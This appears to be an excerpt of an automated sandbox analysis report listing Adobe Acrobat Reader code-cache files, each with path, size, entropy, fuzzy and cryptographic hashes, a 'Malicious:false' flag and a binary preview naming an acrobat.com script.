                                                                                                                          MD5:75FAD8489B0658C67622932762ECD49B
                                                                                                                          SHA1:04E8D50A7E86E70D1B3DF503E9A688335005154E
                                                                                                                          SHA-256:FD5088ECC2959C31609ADB022969BA8880A2F4DC2D25048B1C723B545418C2DB
                                                                                                                          SHA-512:CDFD79A69299F6C0ED4E0E53B5198E4D41B3C12451EE635219B4DC5D1305C1D97FF7F641DB831D809B3E4F522079E1282C9792E68ED19FF090EA919B0C6AD057
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y...e..6...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/9217-chunk.js ..A..Eo...................................*"J.........t......?.>7...w..Qh.X... ;.4...A..Eo......9.\.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\42e11ea2ffad8e49_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):220
                                                                                                                          Entropy (8bit):5.324114302025504
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lUxpllA8RzYOjGLvHkRzNrgGrVTI6kJGMQH5kt1llhF1BxlY82QyCIxy9kH5mi:mhYO6LvEV5g+VTI613H6thvYMIxy+4
                                                                                                                          MD5:6D2325931306AA756822C39CF3017D98
                                                                                                                          SHA1:D3172F9E5206649F8004CBFA3B475A5874CC469F
                                                                                                                          SHA-256:3026A3D17211DA90D3381654E5908B06EDCC9295DB5759FF8B6DF3F3B100CE61
                                                                                                                          SHA-512:D0D5016029296CA2BE71187123DADA6C21A9ADB7EA2E586E3E7EC293C34B3FC3D21F51DD7F485671325F02ABABEACD6A9C1A99F1F0173DEEC35E4F4C763D3187
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......X.....*....._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-spectrum-web-components-core.js ..A..Eo...................................*"J........d..y+M.. ....LO.....g.!0+.ttCY..A..Eo......1u<.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4710e2044cd68481_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.36531935988411
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:ma3/XYO6LvEwQlRmVHGnu0H6t7o4h8AB1:L9OQK1Gnu0ap
                                                                                                                          MD5:B7584A272773BD6C2D6093089DE45C6C
                                                                                                                          SHA1:7A42BBED2BB3A1EB332599DAB6B1524A54DB7A22
                                                                                                                          SHA-256:852FC570179C22A408C3E3BC0A292233B293CAEE13C364DD526EDA3EBF353CCF
                                                                                                                          SHA-512:E747D4E27AAB3BF209CEED4AB6610EBA1DA34D2019EFD2791B7D7BC588B0E2F365E3928112608BD5AFB9FFAFB5D36AEBCF6093B9EE50172281431AEACE2DDDE9
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y.....j...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/9988-chunk.js ..A..Eo...................................*"J.........RknD..c...'......3.62+.!&R..;..A..Eo.........\........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):181
                                                                                                                          Entropy (8bit):5.094735336952367
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+l64HXlA8RzYOCGLvHkjXMLOWFvGH5kt1llhcnj6d1dn76KohyP5mA7/t:md4HXXYOFLvEjMSWFvGH6tg+jUdyP4U
                                                                                                                          MD5:C089CABE3968260AE83080EB52F79F8F
                                                                                                                          SHA1:62CAC70BFF11847F7B2886B53839122573C588A5
                                                                                                                          SHA-256:36AF5D54511AC9914F90F089BD33589311698AC8948A0403E33C0118BA9A5ED6
                                                                                                                          SHA-512:0E6FCB6153BB687D025EE1196A33FC48712F061867D4537949ABDA160B3E8B3548CC3847271EBF3D8CBD98951088656BC28DD882E66114399E38E714DD1C7BA4
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ..A..Eo...................................*"Ja........PU ....t^.....a.k..u.7.M.BW6#}..A..Eo.......+<.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4ca3cb58378aaa3f_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):215
                                                                                                                          Entropy (8bit):5.225905336863877
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:msNXYOFLvEWdpJWNKjQNH6tM8E+IUGkAJO/:BjRpJWNKjeaS8NID
                                                                                                                          MD5:D4CCFFA6412B0C1A8B2F60FF7EA1F315
                                                                                                                          SHA1:F65992E496A63627398F12CC48A5085DFA451CA9
                                                                                                                          SHA-256:28075FABDEACD5442ADB1A1D9B7423BFC239F089F574EAE9F52B974E028EFAA7
                                                                                                                          SHA-512:C657A2C030897D3F5B3FB284768616EE83BFD12A7FDAF6B23D1A9F90FE25979B82C2CDD63BFB74C0D57FA984A2E905E87318298A43DE322C67ADC8708BF69B31
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......S...9O......_keyhttps://rna-resource.acrobat.com/static/js/plugins/unified-share/js/plugin.js ..A..Eo...................................*"J.........e.....@-H.>a..o..sh.5.A.x..C..A..Eo........b.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4fefb7b48f1589a2_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.396453226496036
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:mai//6EYO6LvEwQlRmVNubLku0H6t1hkmWS:W/yeOQKbuvku0aCU
                                                                                                                          MD5:083A4A26BD1C92739D649F11BDB6CF31
                                                                                                                          SHA1:F6A012C28E0BB04C5B1D3EA475DAE9E7F89E5C08
                                                                                                                          SHA-256:F661847404B6866D1C2F38010AF663B3FF556FE2E8157B6C63DB5DE3A72E32B2
                                                                                                                          SHA-512:38CC3A4C61B8CFA67DD84970F34F7ED53754C0664C11F7328684B964BCA7025AD6E0F29A1DFB548B71427EE8D8F72A7BB1E128EDC349DBAA69B153B2ED2F7CBE
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y....b[....._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/1233-chunk.js ..A..Eo...................................*"J............;....(..Wd|....N.b.][A.N....A..Eo......D...........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\54bd97c04db9d043_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.346663463701239
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:mafl/VYO6LvEwQlRmVgu0H6tUhtlRsy04ez:xOQKiu0aStzLA
                                                                                                                          MD5:0CFA14C45EAB1591752DC81E1BB7574D
                                                                                                                          SHA1:7E8A5E98BBCF63FAE4526859D6E7D95BE75A3548
                                                                                                                          SHA-256:2A7052D36F9B0FCEAFEBED87896CA9097B774AA981AB2D6BC2B9BCF1B7538B45
                                                                                                                          SHA-512:EC18E5AD8C35CDCF1E1FEF3DEF1FAF2801D32922BAB686ADF32416491E9150F73172D7B29673DE74862E7BFF7DE2BA5EC64CB30F099F1A09B84E1EB36E263590
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y..........._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/6985-chunk.js ..A..Eo...................................*"J..........`.oA.i.l...v...F.....^\p..7....A..Eo......D.y.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):191
                                                                                                                          Entropy (8bit):5.1795856201184645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lpSUlIv8RzYOCGLvHkWBGKuK2fKVLNH5kt1llhDpXUPqf9tsDMaPV44mLZX:mkl9YOFLvEWsfOLNH6t6PqVyM+VYV
                                                                                                                          MD5:25605E940908369D19776F31E18984A6
                                                                                                                          SHA1:407CD30B5BE2120A2C0D057E1F186D02EF475306
                                                                                                                          SHA-256:35BCA7C4E28AE7E0455687C2B6F5CC468ADA723CE48B6EA3B14D64F263CFABDE
                                                                                                                          SHA-512:9B3DEFC549721580BFBC1D12446E56B3638C2FCC6CBD5B54E52A68FFA91DF2340C6FF5FF059A3E1BBA163E60A61BD5E1D798C2D2232B1B4D94BE6F63F60F2FB9
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js ..A..Eo...................................*"J..........q.O...j....._y..L^z...?..@N..A..Eo......|..Z........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):248
                                                                                                                          Entropy (8bit):5.302597413594254
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:mt9YOFLvEWdVFLBKFjVFLBKFlyNH6tKh//StwSeKaT9pr:URVFAFjVFAFWa3twSeKaTL
                                                                                                                          MD5:0323BCAF95FD9F53F5534FE9BE78F447
                                                                                                                          SHA1:F1F6414D8893A95BAE4CCC28E0C3307167835745
                                                                                                                          SHA-256:11166FC74C74122A608AC7534183608F5D4EAA1E9C72A7DE19E8018D0ABFC196
                                                                                                                          SHA-512:E14C60EC71E1E1334E5DEA00F3C39453A4667398195B516DD9C3EA3A4ABC59A3958389E71B8270293AF6C9F6F1D0AA4CBBA8D5BF2DD15C44C4FF90B63468F174
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ..A..Eo...................................*"JN.............H...{...2../.k`..r4.C. .A..Eo.......A..........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\64766d63a539c3ca_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):216
                                                                                                                          Entropy (8bit):5.252030659033289
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lUZHWK8RzYOCGLvHkWBGKuKjXKKINiB4KPEEKPWFvGH5kt1llhgwF01iwIQx0j:m8nYOFLvEWdfNBHYu0H6tjF0kwUh
                                                                                                                          MD5:9FF3836DEDE7345E9FFDDA6E021E7BE8
                                                                                                                          SHA1:258F4CB1671D84D910431523BB3B1283675B8C8B
                                                                                                                          SHA-256:E28D2BCE6587AAB5D1D2D338C5C02C4ABE046235706C6273B4EB6F92929701D7
                                                                                                                          SHA-512:6CAEAB26A1FD9F1DBBB6963FD1C22F75A2EB640A746660C02DC7A7D06C329A99CA4301E59396BBE1B240A3E16246D03A5E72F786B717E906ABFAD4433F94CB90
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......T....."....._keyhttps://rna-resource.acrobat.com/static/js/plugins/task-handler/js/selector.js ..A..Eo...................................*"J.............8U-....a=...`#..VT.k......A..Eo.......Sk.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6580eb6b2e190c0b_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):230
                                                                                                                          Entropy (8bit):5.311685854960152
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:m7YO6LvEwQlRmV1fOPHku0H6tM3QPQCRyJjkY30:wOQKX2PEu0a54J90
                                                                                                                          MD5:2895A9F166E0184467DED3FA157D5441
                                                                                                                          SHA1:DC2348016987B630C5BB11DB14CFB8ADE249B280
                                                                                                                          SHA-256:A01DF51780529853A579054C89287267AA6532998F57378D32B88C0578078017
                                                                                                                          SHA-512:45FBBD9B426A75FB79AACFB6C3EFDF25CF4213495698EF02DA4F414A4DC76A8B8DAB9FF5DA909BCDAD8E27D3647AA6470636E9878AD434D365999BEA549C49AC
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......b..........._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/desktop-verbs-chunk.js ..A..Eo...................................*"J...............w....|'rq..h...]......A..Eo..................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6a34b53951ee8d83_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):214
                                                                                                                          Entropy (8bit):5.216796598845577
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:m0SdYOFLvEWjLH3Yrv0H6toRIGYlPV5/:WjjHEv0aOot
                                                                                                                          MD5:89C96E326B8B580FC429CD4729C988B6
                                                                                                                          SHA1:C2A5683B114B1F85DAAA055E4B349A1211FD7FCC
                                                                                                                          SHA-256:9DBC8AD68244246250267F4D2EDB9178C1EA4A32B4ABFD2B29EA84FADAE044B1
                                                                                                                          SHA-512:868F621AC48C445DD2EC29182B0C4D1FA99277EDA34DBFF6D69004B941F75318597A48DF00B3B24B61A7DBED70FE1A778DB473212136BE15E99EE4180C85EEB4
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......R...!p......_keyhttps://rna-resource.acrobat.com/static/js/misc/altDekstopCopyPasteHelper.js ..A..Eo...................................*"J........./.vS}....W1m~.{.$W.U[m..l..<...A..Eo..................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6e8773c5f8211d0f_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):208
                                                                                                                          Entropy (8bit):5.348280210251467
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:mOYO6LvEV5g+VTIaBBH6tsTEzbDvS2y4:p/5PRIa3a2szS2y
                                                                                                                          MD5:ECF0718515ACEB05B022828458DBBBDD
                                                                                                                          SHA1:FCA31129A45E20D6440F551E80EE54F845A1D64C
                                                                                                                          SHA-256:C0982869346514F4D79099A9CA5E8AE1279A7A5C7971CFBDE885269A9D9EF59B
                                                                                                                          SHA-512:6C9DE51581FABAB0E9FB5512B768B6B78A9AD1D49613551277B1EB2D5E0C545CE82B57A7DAC5A3C39F6D5CA537515BFEB2E0D89C60CC79F783870747DBE38819
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......L.........._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-spectrum-v3-core.js ..A..Eo...................................*"JT...........l.>........5..U.. G...y.A..Eo.......R^.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):215
                                                                                                                          Entropy (8bit):5.161738183993468
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lx4F08RzYOCGLvHkWBGKuKjXKGBIEGdevA/KPWFvGH5kt1llhfX8WyrpYFmNtl:ms2VYOFLvEWdvBIEGdeXu0H6t7X851
                                                                                                                          MD5:BF1161221E2EC87E1BD28F1E8C3683D1
                                                                                                                          SHA1:02C75183DF292E072724A4103FC611FC9F970D12
                                                                                                                          SHA-256:CB3867AFD1593787D82C92BB60BB7DB163788A237128A5C5091D5A1EC06294AA
                                                                                                                          SHA-512:01E679D64C760FFE384973703818FA5D091CDBBD52C505F020EB85FDB96A1959BB4A607E97E9F171A7B77593E8AE56B4BAE5A2909808B79006252005D1F38516
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js ..A..Eo...................................*"J.........A.o]@r..Q.....<w.....].n\....A..Eo......V.P0........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):206
                                                                                                                          Entropy (8bit):5.263445613732097
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:maVYOFLvEWdwAPCQNH6tEaxm7OhKlvATa:RbR16eaDxmJ5
                                                                                                                          MD5:38C95233351BADD1816254A0B4729F26
                                                                                                                          SHA1:77630200BD5ABFB92826D15C7A52323E8A2B23E6
                                                                                                                          SHA-256:2506EC863171C8ADC464823E664126835CB130FA9A29BDCD9C850BD9D34E2FA9
                                                                                                                          SHA-512:6B93F838DF2ACEF6957FC6370FCBA088F95198DA8DAD828681E67DC4D42D7FDB96BF89C21EE6DBCD33E5213FC0C612C7D263457B4DA995C1B05E333DE0EC2DF0
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js ..A..Eo...................................*"J~.........4T].....Tw.....(..b...EO....9.A..Eo......Y.8%........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):215
                                                                                                                          Entropy (8bit):5.1967546091003936
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lx2gv8RzYOCGLvHkWBGKuKjXKX7KoQRA/KWEKPWFvGH5kt1llhLl//3dF5YufW:ms2gEYOFLvEWdGQRQVu0H6tfl/fdFtr
                                                                                                                          MD5:C334E38FCCBC26219F777651F0A950A4
                                                                                                                          SHA1:B667D16C4041E063AA4496FEB4708B7CD4481C9D
                                                                                                                          SHA-256:E1F90D0FCB2833BC2674C6924C565C46A6C9B7B55302585EDBCBCBA153BD56AD
                                                                                                                          SHA-512:0BD2259ECC472F61A46ACCA279FC07165319D951ECFD1A88EDDE65142477A0D1C2E7EA6591C95CD1AA08C90B8B37FE2121F51BAE88A9E220B0DF529ADE501ECF
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js ..A..Eo...................................*"J........@..{o]...9o|..qY....T....{..u.b..A..Eo......+.ur........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\72d9f526d2e2e7c8_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):230
                                                                                                                          Entropy (8bit):5.26590618099067
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:m+8nYOFLvEWIAuELZRudyPGVH6t0Uce0KGkTqcYp:1StuEH2Zaqg6
                                                                                                                          MD5:1DBD28741A9009EDBE2A00C5EF0A0ECD
                                                                                                                          SHA1:C04D5E619605FEA6F290966E9C744A47C09199C4
                                                                                                                          SHA-256:503792208AC88E24521C35C9365A7E81C47DE28CBB4C580B008294D0E6C91BE0
                                                                                                                          SHA-512:625DD12EF4602203D90753A4BBE150D877DCE01E6A19F9B157DC6773726E6D6CEC2E4FBA7EBE969C6056010097F7DD9DF12F9C80D0972EAC8E3634ECA5CE42BF
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......b.....6....._keyhttps://rna-resource.acrobat.com/static/js/libs/microsoftGraph/microsoft-graph-js-sdk-web.js ..A..Eo...................................*"Ju.............-.....5p9o..k#.}..6(..*A...A..Eo.........I........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7409d5bbc5fe3f12_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.286920914204874
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lz+46v8RzYOjGLvHkwIBIXeRmBVZIku0H5kt1llhR//l9czZb2rVHD0hMmHo/l:maHYO6LvEwQlRmVxu0H6tiFSChnH
                                                                                                                          MD5:2D26E8B6CF1EDAACE0D77C9D9AB4F167
                                                                                                                          SHA1:CE89ACCE1F0F31B73845294E9994E6422BE0D597
                                                                                                                          SHA-256:900653BB8471E0ECD8563C348C8596AE708D7C6C1A3214160A30B859D756F098
                                                                                                                          SHA-512:DDA6A63BF64BFB7D92A085964E10C97125C50A9892238D642758D8E53094A98EA8CA4B54C258CABF135CBF8287AF1F5B9F5DE48EAF2E34471BAC9A244329C678
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y....p8....._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/8368-chunk.js ..A..Eo...................................*"J........X.p...}M?p.^_...8pc....r2.....A..Eo.................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\78bff3512887b83d_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):217
                                                                                                                          Entropy (8bit):5.218070685974734
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:mgEYOFLvEWdpJWNKyu0H6t2zwUR/xXj9I/:neRpJWNK0aEzpRp
                                                                                                                          MD5:CB1B2BD19033A8C16D6D43A5FE107E0E
                                                                                                                          SHA1:B8A6EBEA584EE788232457196BBAC7F1BD79D9D8
                                                                                                                          SHA-256:F35405A988A2D4B30AD3916D8BD59039C1DFA870E5F511E645C2BC0B5CDC415F
                                                                                                                          SHA-512:72175F164FACBC57042B0B73E3511A530059AD60A59589F352D36BF4A53816422552EA7899948BD7CDE0B6B338FCAD27882DAEDB2F2CE00C7C7A398705C70570
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......U...r.L....._keyhttps://rna-resource.acrobat.com/static/js/plugins/unified-share/js/selector.js ..A..Eo...................................*"Jw........U......&.Y|.. . .&.............A..Eo......r.w:........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):210
                                                                                                                          Entropy (8bit):5.252903109562394
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lerlyv8RzYOCGLvHkWBGKuKjXKX+IAHKLuVGH5kt1llhxREnNWQ1SUmgnl/t:mzyEYOFLvEWdrIOQNH6tVREt1S/O
                                                                                                                          MD5:F35AFBC977857B3A4CCC022FFA641288
                                                                                                                          SHA1:D6849248646B8F6B6B29CB883D907C5BFEA5F725
                                                                                                                          SHA-256:7A3582FEB5708BFCAFA8A7841D50768BFE591025D9FE3B629B136D394B6D2709
                                                                                                                          SHA-512:E16388F0D5E7ACFFA3B0B0C43226F713AB4F656DCD63CF9723828797B23C14EE13EF272470F1B6F867BC48F1E5D214504E4DBBBA83F0B809E613E5757D9C3119
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js ..A..Eo...................................*"J+........t\a......x5.'OuE.C..@......x..A..Eo.........8........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\877d24f4204ec9bf_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.34016200518726
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:maePYO6LvEwQlRmVmZtu0H6tM11tLhzdh:IOQK4u0aMbh
                                                                                                                          MD5:A1E41A469AE179028289ED749E2D26CF
                                                                                                                          SHA1:E3DCC0AE35D61930A4E75905D12B841893FC284D
                                                                                                                          SHA-256:D12812F3E530F1643548FB7D2464C0D29D70D6BE362A786A2E433C44C53FAB65
                                                                                                                          SHA-512:B34D319DA56892C7AEA14B32EF4F093D68EA90CE7638AD3179F58F738D3CB492302F806E59E15053A9B0FE7673DBB33838C65A8CF4ABEBA8732B5FFACCDB647D
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y....a.G...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/2882-chunk.js ..A..Eo...................................*"J..........?M..v......df..xq..#.+g..wG....A..Eo.................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\87a0ebc2a54c6f5f_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.43265232151866
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:matbPYO6LvEwQlRmVtTDku0H6tcLaIKz7/:J1OQK7cu0ah
                                                                                                                          MD5:E6E233A4FD8B6702D9A22E1BC72EC0A0
                                                                                                                          SHA1:F6E44A89A3DEF80AEA80FBEEB89C0D4B736D3B99
                                                                                                                          SHA-256:74EA03DC4AF3F0C27C6FB96914FFD4444A6627DF36E97E7FE4C826DA8D71328E
                                                                                                                          SHA-512:F83C7AE10BF2C3AD0E384318B9D32F1608070E1511DACE328E5BC7BB138D55C215D2E39CA77A52F0C4A604541DC82398830D8899124BD139DCB5D3390CBE3B17
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y....x......_keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/7467-chunk.js ..A..Eo...................................*"J.........~....Q.^...*.O.N......g}......A..Eo........3V........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):222
                                                                                                                          Entropy (8bit):5.20369007362357
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lKcv8RzYOCGLvHkWBGKuKjXKoyNH/KPWFvGH5kt1llhON/lBWlwJNqww6U+5mg:mnYOFLvEWdhwyu0H6tyPglwrqwK+4B2
